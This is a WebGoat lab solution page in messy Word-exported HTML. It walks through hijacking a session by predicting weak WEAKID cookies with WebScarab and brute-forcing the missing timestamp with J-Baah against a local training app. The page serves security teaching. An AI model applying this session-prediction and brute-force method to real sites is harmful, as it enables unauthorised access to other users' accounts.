<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Wingdings;
panose-1:5 0 0 0 0 0 0 0 0 0;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 268435456 0 0 -2147483648 0;}
@font-face
{font-family:"MS Mincho";
panose-1:2 2 6 9 4 2 5 8 3 4;
mso-font-alt:"\FF2D\FF33 \660E\671D";
mso-font-charset:128;
mso-generic-font-family:modern;
mso-font-pitch:fixed;
mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;
mso-font-charset:0;
mso-generic-font-family:roman;
mso-font-pitch:variable;
mso-font-signature:-1610611985 1107304683 0 0 159 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
@font-face
{font-family:"\@MS Mincho";
panose-1:2 2 6 9 4 2 5 8 3 4;
mso-font-charset:128;
mso-generic-font-family:modern;
mso-font-pitch:fixed;
mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-parent:"";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";}
h1
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-link:"Heading 1 Char";
mso-style-next:Normal;
margin-top:12.0pt;
margin-right:0cm;
margin-bottom:3.0pt;
margin-left:0cm;
mso-pagination:widow-orphan;
page-break-after:avoid;
mso-outline-level:1;
font-size:16.0pt;
font-family:"Arial","sans-serif";
mso-fareast-font-family:"MS Mincho";
mso-font-kerning:16.0pt;
mso-fareast-language:JA;
font-weight:bold;}
h2
{mso-style-noshow:yes;
mso-style-priority:9;
mso-style-qformat:yes;
mso-style-link:"Heading 2 Char";
mso-style-next:Normal;
margin-top:10.0pt;
margin-right:0cm;
margin-bottom:0cm;
margin-left:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan lines-together;
page-break-after:avoid;
mso-outline-level:2;
font-size:13.0pt;
font-family:"Cambria","serif";
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:major-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:major-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;
color:#4F81BD;
mso-themecolor:accent1;
font-weight:bold;}
p.MsoCaption, li.MsoCaption, div.MsoCaption
{mso-style-noshow:yes;
mso-style-qformat:yes;
mso-style-next:Normal;
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";
font-weight:bold;}
p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
{mso-style-noshow:yes;
mso-style-priority:99;
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;}
a:link, span.MsoHyperlink
{mso-style-noshow:yes;
color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-noshow:yes;
mso-style-priority:99;
color:purple;
mso-themecolor:followedhyperlink;
text-decoration:underline;
text-underline:single;}
p
{mso-style-noshow:yes;
mso-style-priority:99;
mso-margin-top-alt:auto;
margin-right:0cm;
mso-margin-bottom-alt:auto;
margin-left:0cm;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
mso-style-priority:99;
mso-style-link:"Balloon Text Char";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:"Tahoma","sans-serif";
mso-fareast-font-family:"Times New Roman";}
span.Heading1Char
{mso-style-name:"Heading 1 Char";
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Heading 1";
mso-ansi-font-size:16.0pt;
mso-bidi-font-size:16.0pt;
font-family:"MS Mincho";
mso-ascii-font-family:"MS Mincho";
mso-fareast-font-family:"MS Mincho";
mso-hansi-font-family:"MS Mincho";
mso-bidi-font-family:Arial;
mso-font-kerning:16.0pt;
mso-fareast-language:JA;
font-weight:bold;}
span.Heading2Char
{mso-style-name:"Heading 2 Char";
mso-style-noshow:yes;
mso-style-priority:9;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Heading 2";
mso-ansi-font-size:13.0pt;
mso-bidi-font-size:13.0pt;
font-family:"Cambria","serif";
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:major-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:major-latin;
color:#4F81BD;
mso-themecolor:accent1;
font-weight:bold;}
span.BalloonTextChar
{mso-style-name:"Balloon Text Char";
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Balloon Text";
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;
font-family:"Tahoma","sans-serif";
mso-ascii-font-family:Tahoma;
mso-fareast-font-family:"Times New Roman";
mso-hansi-font-family:Tahoma;
mso-bidi-font-family:Tahoma;}
.MsoChpDefault
{mso-style-type:export-only;
mso-default-props:yes;
font-size:10.0pt;
mso-ansi-font-size:10.0pt;
mso-bidi-font-size:10.0pt;
mso-ascii-font-family:Arial;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Arial;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;}
@page Section1
{size:612.0pt 792.0pt;
margin:72.0pt 72.0pt 72.0pt 72.0pt;
mso-header-margin:35.4pt;
mso-footer-margin:35.4pt;
mso-paper-source:0;}
div.Section1
{page:Section1;}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Arial","sans-serif";
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="3074"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution: How to Hijack a Session</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Hijack a Session</p>
<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
<p><b>Concept / Topic To Teach:</b><br/>
Application developers who develop their own session IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specific session ID is not complex and random, then the application is highly susceptible to session-based brute force attacks.
</p>
<div class=Section1>
<p><b>General Goal(s):</b><br/>
Try to access an authenticated session belonging to someone else. <br/><br/>
In this lesson we are trying to predict the WEAKID value. THe WEAKID is used to differentiate authenticated and anonymous users of WebGoat.
</p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<b>Solution:</b><br/><br/>
The easiest way to complete this lesson is to use WebScarab's Session ID Analysis feature. The Solution Videos provide another method of uncovering it as well.<br/><br/>
To access the Session ID Analysis, you need to put WebScarab in its full-featured mode, if it isn't already. This can be enabled by going to <b>Tools -> use full-featured interface</b> in WebScarab.<br/>
Click on the SessionID Analysis tab at the top of the page, then use the <b>Previous Requests</b> dropdown to select the most recent GET request with a 200 OK header. Its address will end with webgoat/attack, not an image or java file.<br/><br/>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
Hijack a Session<o:p></o:p></span></p>
<img src="lesson_solutions/WeakSessionID_files/image001.jpg"><br/>
<font size="2"><b>Selecting the correct GET request for Session ID analysis.</b></font><br/><br/>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
Next, we need to make sure that WebScarab is able to fetch the WEAKID cookie. Click the <b>Test</b> button at the bottom of the page. You should get a popup window showing the WEAKID.<br/><br/>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
<img src="lesson_solutions/WeakSessionID_files/image002.jpg"><br/>
<font size="2"><b>Succesful WEAKID test popup.</b></font><br/><br/>
<!-- Start Instructions -->
If the popup indicates that no valid session is found, that means there is already a WEAKID value in the request. This prevents the &quot;Set-Cookie&quot; header from being sent in the response. To fix this, delete the <b>WEAKID=value;</b> portion of the Cookie header and press test again.<br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Application
developers who develop their own session IDs frequently forget to incorporate
the complexity and randomness necessary for security. If the user specific
session ID is not complex and random, then the application is highly
susceptible to session-based brute force attacks. <o:p></o:p></span></p>
Now we need to fetch a set of WEAKIDs. Enter &quot;50&quot; into the <b>Samples</b> field at the bottom of the window, then press <b>Fetch</b>. Switch to the &quot;Analysis&quot; tab. Select the WEAKID option from the <b>Session Identifier</b> dropdown, and the window should populate with WEAKID values.<br/><br/>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
The WEAKID is divided into two parts: the first part before the dash is an identifier that increases by 1 in each cookie, and the part after the dash is a time value that is calculated when the request is submitted.<br/>
Notice that there is sometimes a gap in the first value of the WEAKID, where one number is skipped. The missing value is what we need to log in, we just need to figure out the time stamp value that goes after the dash.<br/><br/>
It's simple to spot where this value is. Look at the &quot;Difference&quot; column on the analysis screen. Almost all of the values will be only one or two apart. We are looking for the record where this value is around double the rest of them.<br/><br/>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
<img src="lesson_solutions/WeakSessionID_files/image003.jpg"><br/>
<font size="2"><b>Analysis screen with the cookie of interest highlighted.</b></font><br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Try to access
an authenticated session belonging to someone else. <o:p></o:p></span></p>
This WEAKID follows the one we're trying to find. You will notice the identifier of the cookie preceding the highlighted one is two less, whereas all the other cookies decrease only by one. The one missing is what we want to find:<br/>
<b><font color="red">16964</font>-1312472439375</b><br/>
<b><font color="red">16966</font>-1312472439484</b><br/><br/>
The WEAKID beginning with <b>16965</b> is missing. This is the WEAKID we want, we just need to figure out the second part.<br/>
<!-- Stop Instructions -->
We'll figure this out by using the brute force method. We will send requests with each possible timestamp value until we find one that is successful. Its timestamp must be between the two surrounding it:<br/>
<b>16964-<font color="red">1312472439375</font></b><br/>
<b>16965-<font color="red">?????????????</font></b><br/>
<b>16966-<font color="red">1312472439484</font></b><br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
So our timestamp is between <b>1312472439375</b> and <b>1312472439484</b>. Now we just need a program to do brute force this for us. We will use <a href="http://www.sensepost.com/labs/tools/pentest/j-baah" target="_blank">J-Baah</a>, previously known as Crowbar. Download it and run the .jar.<br/><br/>
We will configure J-Baah to send our request repeatedly, with a different WEAKID each time. Copy our RAW HTTP Request we used to generate these cookies, found under the Collection tab. Paste it in the Request box in J-Baah.<br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In this
lesson the purpose is to predict the WEAKID value. The WEAKID is used to
differentiate authenticated and anonymous users of WebGoat.<o:p></o:p></span></p>
The WEAKID paramter needs to be put into the request. It will begin with the missing value we figured out before the dash, <b>16965</b> in our case. How do we fill in the rest when we dont know what it is?<br/>
In this case, we will add <b>WEAKID=16965-1312472439<font color="red">##1##</font>;</b> to the Cookie paramter of our request. The <b><font color="red">##1##</font></b> replaces the part of the timestamp that varies in our range. Next, we specify this range. In the Paramter 1 Tab, we set <b>From</b> as 375, and <b>To</b> as 484.<br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<img src="lesson_solutions/WeakSessionID_files/image004.jpg"><br/>
<font size="2"><b>J-Baah setup.</b></font><br/><br/>
Lastly, go to the &quot;Target&quot; tab at the bottom right, and set the <b>Host</b> to localhost and the <b>Port</b> to whichever port WebGoat is using, generally 80 or 8080.<br/>
Go back to the &quot;Action&quot; tab, and click <b>Base Response</b>. You should see a message on the bottom left that a response is generated successfully. Change <b>Threads</b> to 2 and then press <b>Start</b>. The bottom left window should start filling up with &quot;Hijack a session&quot;<br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_785" o:spid="_x0000_i1034" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="lesson_solutions/WeakSessionID_files/image020.jpg" v:shapes="Picture_x0020_785"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<img src="lesson_solutions/WeakSessionID_files/image005.jpg"><br/>
<font size="2"><b>All of the responses for each WEAKID. The successful attempt is highlighted.</b></font><br/><br/>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
Before we go any further, it is important to understand what is happening here. The <b>##1##</b> string is replaced with a different number in the range we specified and the request is sent. The first WEAKID tried is <b>16965-1312472439375</b>, then it tries every timestamp until the last one, <b>16965-1312472439484</b>. J-Baah collects all of these responses and shows them in the bottom left window.<br/><br/>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:</span></b><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
Each line shows one response, and displays important information about it.<br/><br/>
<b><font color="red">0.99969</font> : 417 : : Hijack a Session</b><br/>
